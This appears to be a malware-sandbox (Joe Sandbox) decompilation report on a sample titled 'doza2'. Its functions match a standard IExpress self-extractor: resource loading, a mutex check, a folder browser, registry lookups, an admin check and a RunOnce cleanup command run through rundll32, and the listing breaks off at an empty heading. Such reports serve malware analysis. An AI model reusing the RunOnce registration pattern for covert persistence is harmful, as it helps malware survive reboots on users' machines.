0x00402ede
0x00402eed
0x00000000
0x00000000
0x00000000
0x00000000
0x00402eed
0x00402eef
0x00402eef
0x00402eef
0x00402eef
0x00402ea2
0x00402e86
0x00402e88
0x00402e88
0x00402e43
0x00402e48
0x00000000
0x00402e48
0x00402e30
0x00402e30
0x00402ef8
0x00402f01
0x00000000
0x00402f01
0x00402d8a
0x00402d8f
0x00402da1
0x00000000
0x00402da3
0x00402dae
0x00402db4
0x00402dbb
0x00000000
0x00402dca
0x00402dd3
0x00402df5
0x00402e02
0x00000000
0x00000000
0x00000000
0x00000000
0x00402dd5
0x00402dde
0x00402de3
0x00402e04
0x00402e0a
0x00402e10
0x00000000
0x00402e10
0x00402dd3
0x00402dbb
0x00402da1
0x00402d5b
0x00402d5b
0x00402d5d
0x00402d69
0x00402d6e
0x00402f06
0x00402f06
0x00402f06
0x00402d59
0x00402f18

APIs

memset.MSVCRT ref: 00402CD9
memset.MSVCRT ref: 00402CE9
memset.MSVCRT ref: 00402CF9

Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00402D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00402D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00402DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00402DBD
CloseHandle.KERNEL32(doza2,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00402E0A

Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554

Strings

INSTANCECHECK, xrefs: 00402D95
EXTRACTOPT, xrefs: 00402D4D
VERCHECK, xrefs: 00402E54
TITLE, xrefs: 00402D09
doza2, xrefs: 00402D04, 00402DD9, 00402DF0

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$doza2
API String ID: 1002816675-859929227
Opcode ID: 06a1384d55922b296fef3c7e0fb44f01fcc884fa569341a545031c3eadd7a355
Instruction ID: e444e2bf9980804398d7675b07319dafb34b849b4f2297f1b5b9eb94544be107
Opcode Fuzzy Hash: 06a1384d55922b296fef3c7e0fb44f01fcc884fa569341a545031c3eadd7a355
Instruction Fuzzy Hash: 2D51C470340301ABE764AB25DF4EB7B2698DB85744F10403FBA81F56E1DAFC8C519A5E

Uniqueness

Uniqueness Score: -1.00%

Function 004034F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004034F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x4091d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x408584 = _t35;
					E004043D0(_t35, GetDesktopWindow());
					__eflags =  *0x408184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "doza2");
					_t17 = CreateThread(0, 0, E00404FE0, 0, 0, 0x408798);
					 *0x40879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E004044B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x40858c);
					_t38 =  *0x408584; // 0x0
					_t25 = E004044B9(_t38, 0x4b2, 0x401140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x4091d8 = 1;
						SetEvent( *0x40858c);
						_t39 =  *0x40879c; // 0x0
						E00403680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x40858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x40879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x004034fb
0x004034fe
0x00403665
0x00403666
0x00403666
0x00403668
0x0040366e
0x0040366e
0x00403671
0x00403671
0x00403677
0x00000000
0x00403677
0x00403504
0x00403506
0x00403507
0x0040350c
0x0040365b
0x0040365f
0x00000000
0x00000000
0x00000000
0x00403661
0x00403512
0x00403515
0x004035be
0x004035c1
0x004035d1
0x004035d8
0x004035de
0x004035f8
0x00403617
0x00403617
0x00403623
0x00403637
0x0040363d
0x00403642
0x00403644
0x00000000
0x00403646
0x00403652
0x00403657
0x00403658
0x00000000
0x00403658
0x00403644
0x0040351b
0x0040351d
0x0040354f
0x00403553
0x00000000
0x00000000
0x0040355f
0x00403565
0x0040357c
0x00403581
0x00403584
0x0040359b
0x004035a1
0x004035a7
0x004035ad
0x004035b3
0x004035b8
0x00000000
0x004035b8
0x00403586
0x00403588
0x00000000
0x00000000
0x00403590
0x00000000
0x00403590
0x00403524
0x00403535
0x00403541
0x00000000
0x00403549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 00403535
EndDialog.USER32(?,?), ref: 00403541
ResetEvent.KERNEL32 ref: 0040355F
SetEvent.KERNEL32(00401140,00000000,00000020,00000004), ref: 00403590
GetDesktopWindow.USER32 ref: 004035C7
GetDlgItem.USER32(?,0000083B), ref: 004035F1
SendMessageA.USER32(00000000), ref: 004035F8
GetDlgItem.USER32(?,0000083B), ref: 00403610
SendMessageA.USER32(00000000), ref: 00403617
SetWindowTextA.USER32(?,doza2), ref: 00403623
CreateThread.KERNEL32 ref: 00403637
EndDialog.USER32(?,00000000), ref: 00403671

Strings

doza2, xrefs: 0040361D

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: doza2
API String ID: 2406144884-612509477
Opcode ID: a4f2e3a6efda55c1be015cdbd079bcaf155c5ca070df6f1d562e5e6d6ca8b650
Instruction ID: fe1ba82ed1f1710f0b6574d98c0674f12e8c992116b8aaefa4380529af25bc15
Opcode Fuzzy Hash: a4f2e3a6efda55c1be015cdbd079bcaf155c5ca070df6f1d562e5e6d6ca8b650
Instruction Fuzzy Hash: 6C317271240301BBD7205F25AE4DF2B3E68E789B42F14493AF642B93F5CA7A8911CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 00404224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00404224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E004044B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x4088c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x4087a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x408598;
					_v36 = 1;
					_v32 = E00404200;
					_v28 = 0x4088c0;
					 *0x40a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x40a288(_t32, 0x4088c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x4088c0 != 0) {
							E00401680(0x4087a0, 0x104, 0x4088c0);
						}
						 *0x40a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x4087a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x4088c0);
					_t61 = 0x4088c0;
					_t4 =  &(_t61[1]); // 0x4088c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x4088c0; // 0x811181
					_t44 = CharPrevA(0x4088c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x4088c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x00404234
0x0040423c
0x00404240
0x004043b2
0x004043b7
0x004043c0
0x00000000
0x004043c5
0x0040424c
0x00404252
0x00404257
0x004043a4
0x004043a5
0x004043ab
0x00000000
0x004043ab
0x00404263
0x00404269
0x0040426e
0x00000000
0x00000000
0x0040427a
0x00404280
0x00404285
0x00000000
0x00000000
0x0040428d
0x00404293
0x004042e6
0x004042e9
0x004042ef
0x004042f4
0x004042f7
0x00404300
0x00404307
0x0040430e
0x00404315
0x0040431c
0x00404322
0x00404326
0x0040432d
0x0040432d
0x0040432f
0x00404334
0x00404343
0x00404349
0x0040434d
0x00404354
0x00404354
0x0040435d
0x0040436e
0x0040436e
0x0040437d
0x00404383
0x00404387
0x0040438e
0x0040438e
0x00404387
0x00404391
0x00404399
0x00000000
0x00404295
0x0040429f
0x004042a5
0x004042aa
0x004042aa
0x004042ad
0x004042ad
0x004042af
0x004042b0
0x004042b6
0x004042c2
0x004042c8
0x004042ce
0x004042e4
0x004042e4
0x00000000
0x004042ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00404236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0040424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 00404263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0040427A
GetTempPathA.KERNEL32(00000104,004088C0,?,00000001), ref: 0040429F
CharPrevA.USER32(004088C0,00811181,?,00000001), ref: 004042C2
CharPrevA.USER32(004088C0,00000000,?,00000001), ref: 004042D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00404391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 004043A5

Strings

SHGetPathFromIDList, xrefs: 00404274
SHBrowseForFolder, xrefs: 00404246
SHELL32.DLL, xrefs: 0040422F

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: 62c8c5832672bbbd4f51870b14db4df699431c97bf1b6f77f9cc7bfa0f1f7c63
Instruction ID: 0b25c262f151fa20e67494b359207c62db184f6ba7d2e960933b952b011f601d
Opcode Fuzzy Hash: 62c8c5832672bbbd4f51870b14db4df699431c97bf1b6f77f9cc7bfa0f1f7c63
Instruction Fuzzy Hash: 6841D2B4A00304AFE711AF60DE84A6E7BA4EB85344F54417EEA81B73D1CB7C8D05876D

Uniqueness

Uniqueness Score: -1.00%

Function 00402773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00402773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x408004; // 0xee8c6708
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00401781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0040658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0040658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x401140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00401680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00406CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x00402773
0x0040277e
0x00402785
0x0040278a
0x0040278d
0x00402790
0x00402792
0x00402798
0x0040279d
0x004028b2
0x00000000
0x004027a3
0x004027a3
0x004027af
0x004027c2
0x004027c8
0x004027cd
0x004027d5
0x004028b7
0x004028b9
0x00000000
0x004027db
0x004027dd
0x004028aa
0x00000000
0x004027e3
0x004027e3
0x004027ec
0x004027f8
0x00402803
0x0040280b
0x00402831
0x004028c3
0x004028c9
0x004028cd
0x00402837
0x0040285a
0x0040285c
0x00402865
0x00402892
0x00402895
0x00000000
0x00000000
0x00402867
0x00402878
0x0040288c
0x00000000
0x0040287a
0x00402880
0x00402885
0x00402897
0x00402899
0x00402899
0x00402878
0x00402865
0x004028a0
0x004028bf
0x004028c1
0x00000000
0x00000000
0x004028c1
0x00402831
0x004027dd
0x004027d5
0x004028e5

APIs

CharUpperA.USER32(EE8C6708,00000000,00000000,00000000), ref: 004027A8
CharNextA.USER32(0000054D), ref: 004027B5
CharNextA.USER32(00000000), ref: 004027BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402829
RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 004028A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 004028AA
GetSystemDirectoryA.KERNEL32(-00000005,00000104), ref: 004028B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 004027E4

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: e046747f357c46f050dce2852b115ef3c86e064c1e2556bd9d83d58dfc6506bf
Instruction ID: b29046f07952b478a6343dcd1b107d04b4820205fbcf11bc0dc1fa30adae9d17
Opcode Fuzzy Hash: e046747f357c46f050dce2852b115ef3c86e064c1e2556bd9d83d58dfc6506bf
Instruction Fuzzy Hash: FA41F87590012C6FDB249F549D49AEA77BCEF15300F0080BAF945F2190CBB44E968FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00402267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00402267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x408004; // 0xee8c6708
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x408530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0040658A( &_v268, 0x104, 0x401140);
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
							E0040171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00406CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x00402272
0x00402277
0x00402279
0x00402283
0x00402289
0x004022ab
0x004022b1
0x004022c4
0x004022e0
0x004022e6
0x004022f5
0x0040230d
0x0040231c
0x0040231c
0x00402321
0x0040233a
0x00402342
0x00402348
0x0040234b
0x0040234c
0x0040234c
0x0040234e
0x0040234f
0x0040236e
0x0040236e
0x0040237a
0x00402380
0x00402380
0x00402381
0x00402381
0x0040238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 004022A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 004022D8
memset.MSVCRT ref: 004022F5
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00402305
RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0040236E
RegCloseKey.ADVAPI32(?), ref: 0040237A

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00402321
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0040232D
wextract_cleanup0, xrefs: 0040227C, 004022CD, 00402363
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00402299

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
API String ID: 3027380567-2554356261
Opcode ID: 247cee02729445f1a6684307d51db0c04144f96146b3de10c2f9ee9ee34981a8
Instruction ID: 8d6967f2b6b69c3bcd6c1b378378b2e216aa965ec765d16025e56e3eb759036c
Opcode Fuzzy Hash: 247cee02729445f1a6684307d51db0c04144f96146b3de10c2f9ee9ee34981a8
Instruction Fuzzy Hash: 2E31C871A002186BDB219F61DD49FDB777CEB54704F0001FAB94DB61D1DA786F88CA54

Uniqueness

Uniqueness Score: -1.00%

Function 00403100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00403100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x408590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x408590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E004043D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x408d4c);
					SetWindowTextA(_t33, "doza2");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x4088b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E004030C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x00403108
0x0040310b
0x004031b7
0x004031ca
0x004031d0
0x004031d0
0x004031da
0x00000000
0x004031da
0x00403111
0x00403114
0x00403136
0x00403136
0x00403138
0x0040313b
0x00403141
0x00000000
0x00403143
0x00403116
0x0040311b
0x0040314b
0x00403151
0x00403158
0x0040316a
0x00403176
0x0040317d
0x0040318b
0x0040319e
0x004031a3
0x00000000
0x004031ad
0x00403120
0x00000000
0x00000000
0x0040312a
0x00403134
0x00000000
0x00000000
0x00000000
0x00403134
0x0040312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 0040313B
GetDesktopWindow.USER32 ref: 0040314B
SetDlgItemTextA.USER32(?,00000834), ref: 0040316A
SetWindowTextA.USER32(?,doza2), ref: 00403176
SetForegroundWindow.USER32(?), ref: 0040317D
GetDlgItem.USER32(?,00000834), ref: 00403185
GetWindowLongA.USER32(00000000,000000FC), ref: 00403190
SetWindowLongA.USER32(00000000,000000FC,004030C0), ref: 004031A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 004031CA

Strings

doza2, xrefs: 00403170

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: doza2
API String ID: 3785188418-612509477
Opcode ID: 867529428936b8af0a001c92f2b8928eb253d54033c5a874c9100fdf34310dde
Instruction ID: 246b5d21e6c1ac9ca4eb47d67caf4067a6fe804b44cd1f9aeadbe74bb776ad20
Opcode Fuzzy Hash: 867529428936b8af0a001c92f2b8928eb253d54033c5a874c9100fdf34310dde
Instruction Fuzzy Hash: B911B131204211BBDB115F64AE0CB5B3E68EB4E722F100636F855B92E0DBB89A51C78E

Uniqueness

Uniqueness Score: -1.00%

Function 004018A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004018A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x408004; // 0xee8c6708
				_v8 = _t23 ^ _t53;
				_t25 =  *0x408128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00406CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E004017EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x408128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x408128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x004018a3
0x004018a3
0x004018ab
0x004018b2
0x004018b5
0x004018be
0x004018c0
0x004018c6
0x004018c7
0x004018ca
0x004018cf
0x004019c9
0x004019d8
0x004019d8
0x004018df
0x004019b8
0x004019bd
0x004019bf
0x004019bf
0x00000000
0x004019bd
0x004018fa
0x00000000
0x00000000
0x00401912
0x004019aa
0x004019ad
0x004019b3
0x00000000
0x00401927
0x00401927
0x00401932
0x00401936
0x004019a9
0x004019a9
0x00000000
0x004019a9
0x0040194c
0x004019a2
0x004019a3
0x00000000
0x0040196e
0x00401970
0x00401999
0x0040199c
0x00000000
0x0040199c
0x00401972
0x00401972
0x00401975
0x00401984
0x00401985
0x0040198a
0x00000000
0x00000000
0x00000000
0x0040198c
0x00401991
0x00401996
0x00000000
0x00401996
0x0040194c

APIs

